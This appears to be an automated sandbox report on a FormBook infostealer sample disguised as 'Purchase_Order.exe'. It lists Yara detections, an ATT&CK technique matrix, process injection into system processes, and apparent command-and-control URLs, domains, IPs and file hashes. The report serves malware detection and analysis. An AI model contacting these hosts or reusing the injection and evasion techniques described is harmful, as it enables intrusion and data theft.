            Source: Yara match | File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match | File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules1 | Path Interception | Process Injection712 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection712 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing2 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact

            Behavior Graph

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 433266 | Sample: Purchase_Order.exe | Startdate: 11/06/2021 | Architecture: WINDOWS | Score: 100

            Start
              DNS/IP: www.homeanddesignstudio.com; td-balancer-euw2-6-109.wixdns.net; 4 other IPs or domains
              Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
              started: Purchase_Order.exe
            Purchase_Order.exe
              Dropped: C:\Users\user\...\Purchase_Order.exe.log, ASCII
              Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
              started: RegSvcs.exe
            RegSvcs.exe
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
              injected: explorer.exe
            explorer.exe
              DNS/IP: www.cgjanvier.com 156.241.53.127, 49737, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; mexicobeachselfstorage.com 162.241.253.69, 49730, 80 UNIFIEDLAYER-AS-1US United States; 14 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit)
              started: systray.exe
            systray.exe
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              started: cmd.exe
            cmd.exe
              started: conhost.exe

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            Purchase_Order.exe | 21% | Virustotal |
            Purchase_Order.exe | 15% | ReversingLabs | Win32.Trojan.Wacatac

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            4.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            mexicobeachselfstorage.com | 0% | Virustotal |
            td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://schemas.mi | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
            http://www.carterandcone.comen | 0% | URL Reputation | safe
            http://www.tiro.com | 0% | URL Reputation | safe
            http://www.goodfont.co.kr | 0% | URL Reputation | safe
            http://www.carterandcone.com | 0% | URL Reputation | safe
            http://www.tylerrucarean.com/uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.flockuplabs.com/uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe
            http://www.paolograssino.com/uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.typography.netD | 0% | URL Reputation | safe
            http://www.prltoday.com/uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.carterandcone.commd | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
            http://www.mexicobeachselfstorage.com/uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
            http://fontfabrik.com | 0% | URL Reputation | safe
            http://www.trainup-wall.com/uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/jp/N | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/jp/Q | 0% | Avira URL Cloud | safe
            http://www.sandoll.co.kr | 0% | URL Reputation | safe
            http://www.cgjanvier.com/uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.urwpp.deDPlease | 0% | URL Reputation | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
            http://www.culturalinterface.net/uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.sakkal.com | 0% | URL Reputation | safe
            http://www.carterandcone.coma | 0% | URL Reputation | safe
            http://www.a-prime-india-demataccount.zone/uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/X | 0% | URL Reputation | safe
            http://www.gorditasdemaiz.com/uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.toolbnbapp.com/uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT | 0% | Avira URL Cloud | safe
            http://www.agfamonotype. | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/Q | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/N | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/oi | 0% | Avira URL Cloud | safe
            http://schemas.micr | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
            http://en.w | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/= | 0% | URL Reputation | safe
            www.culturalinterface.net/uqf5/ | 0% | Avira URL Cloud | safe
            http://www.carterandcone.coml | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            mexicobeachselfstorage.com | 162.241.253.69 | true | true | | unknown
            td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | true | | unknown
            www.trainup-wall.com | 45.140.167.161 | true | true | | unknown
            www.a-prime-india-demataccount.zone | 172.67.155.26 | true | true | | unknown
            www.gorditasdemaiz.com | 151.101.0.119 | true | true | | unknown
            www.cgjanvier.com | 156.241.53.127 | true | true | | unknown
            paolograssino.com | 160.16.235.37 | true | true | | unknown
            www.stays.travel | 91.195.240.94 | true | false | | unknown
            toolbnbapp.com | 34.102.136.180 | true | false | | unknown
            www.prltoday.com | 213.186.33.5 | true | true | | unknown
            www.culturalinterface.net | 104.21.64.212 | true | true | | unknown
            tylerrucarean.com | 34.102.136.180 | true | false | | unknown
            flockuplabs.com | 184.168.131.241 | true | true | | unknown
            www.flockuplabs.com | unknown | unknown | true | | unknown
            www.paolograssino.com | unknown | unknown | true | | unknown
            www.toolbnbapp.com | unknown | unknown | true | | unknown
            www.homeanddesignstudio.com | unknown | unknown | true | | unknown
            www.mexicobeachselfstorage.com | unknown | unknown | true | | unknown
            www.tylerrucarean.com | unknown | unknown | true | | unknown

                                              Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.tylerrucarean.com/uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT | false | Avira URL Cloud: safe | unknown
            http://www.flockuplabs.com/uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.paolograssino.com/uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.prltoday.com/uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.mexicobeachselfstorage.com/uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.trainup-wall.com/uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.cgjanvier.com/uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.culturalinterface.net/uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.a-prime-india-demataccount.zone/uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.gorditasdemaiz.com/uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT | true | Avira URL Cloud: safe | unknown
            http://www.toolbnbapp.com/uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT | false | Avira URL Cloud: safe | unknown
            www.culturalinterface.net/uqf5/ | true | Avira URL Cloud: safe | low

                                              URLs from Memory and Binaries


                                                                          Contacted IPs


                                                                          General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433266
Start date: 11.06.2021
Start time: 15:00:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Purchase_Order.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@13/10
EGA Information: Failed
HDC Information:
• Successful, ratio: 62.1% (good quality ratio 56.8%)
• Quality average: 73.2%
• Quality standard deviation: 30.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.42.151.234, 92.122.145.220, 184.30.20.56, 20.82.209.183, 2.20.142.209, 2.20.142.210, 20.190.160.8, 20.190.160.67, 20.190.160.6, 20.190.160.2, 20.190.160.129, 20.190.160.136, 20.190.160.132, 20.190.160.71, 92.122.213.247, 92.122.213.194, 20.54.7.98, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big; too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time: 15:01:14
Type: API Interceptor
Description: 83x Sleep call for process: Purchase_Order.exe modified

Joe Sandbox View / Context

IPs


Domains


ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase_Order.exe.log
Process: C:\Users\user\Desktop\Purchase_Order.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1400
Entropy (8bit): 5.344635889251176
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEg:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHV
MD5: 394E646B019FF472CE37EE76A647A27F
SHA1: BD5872D88EE9CD2299B5F0E462C53D9E7040D6DA
SHA-256: 2295A0B1F6ACD75FB5D038ADE65725EDF3DDF076107AEA93E4A864E35974AE2A
SHA-512: 7E95510C85262998AECC9A06A73A5BF6352304AF6EE143EC7E48A17473773F33A96A2F4146446444789B8BCC9B83372A227DC89C3D326A2E142BCA1E1A9B4809
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.297638335921384
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Purchase_Order.exe
File size: 1532416
MD5: 4aa8159742becd97f9ecdda33798b065
SHA1: 775aee28c33102de8c4bdd45dd09821b717b8678
SHA256: 65c6621762bb1bb1589a4a58d4ab2d3fa7c02e581b217b86ed2ff51227d7565b
SHA512: ab15ec93f68f355de7a6cb66c089f1956dd29c301dbdfa3145083cfb5c653c24083f9c01ed5398a2631e8c1a37ffcdae7b3b38b90c1836c29af2c72ef23e0366
SSDEEP: 24576:VENeBUdtwsEgws8e/z8YEoqSg5LlJfH6zMIDsxTt8ZnIYqmaGHB/7YaL:uwBUwsEgws8e5U/BldOpIY3rHBDYaL
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. ....................................@................................

File Icon

Icon Hash: e0c6a169f4bed870

Static PE Info

General

Entrypoint: 0x54f9d2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60C3160F [Fri Jun 11 07:51:43 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14f980 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x150000 | 0x28354 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x17a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x14f848 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x14d9d8 | 0x14da00 | False | 0.694698535266 | data | 7.38800218232 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x150000 | 0x28354 | 0x28400 | False | 0.599797408773 | data | 6.35218035715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x17a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1501a0 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x150618 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x1516d0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x153c88 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x157ec0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
RT_ICON | 0x1686f8 | 0xf255 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0x177960 | 0x5a | data | |
RT_VERSION | 0x1779cc | 0x396 | big endian ispell hash file (?), | |
RT_MANIFEST | 0x177d74 | 0x5da | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2015 Benz
Assembly Version | 1.6.0.65
InternalName | AsAnyMarshaler.exe
FileVersion | 1.6.0.65
CompanyName | Town and Country Convenience Stores
LegalTrademarks |
Comments |
ProductName | CDWorkFlow
ProductVersion | 1.6.0.65
FileDescription | CDWorkFlow
OriginalFilename | AsAnyMarshaler.exe

Network Behavior

Snort IDS Alerts

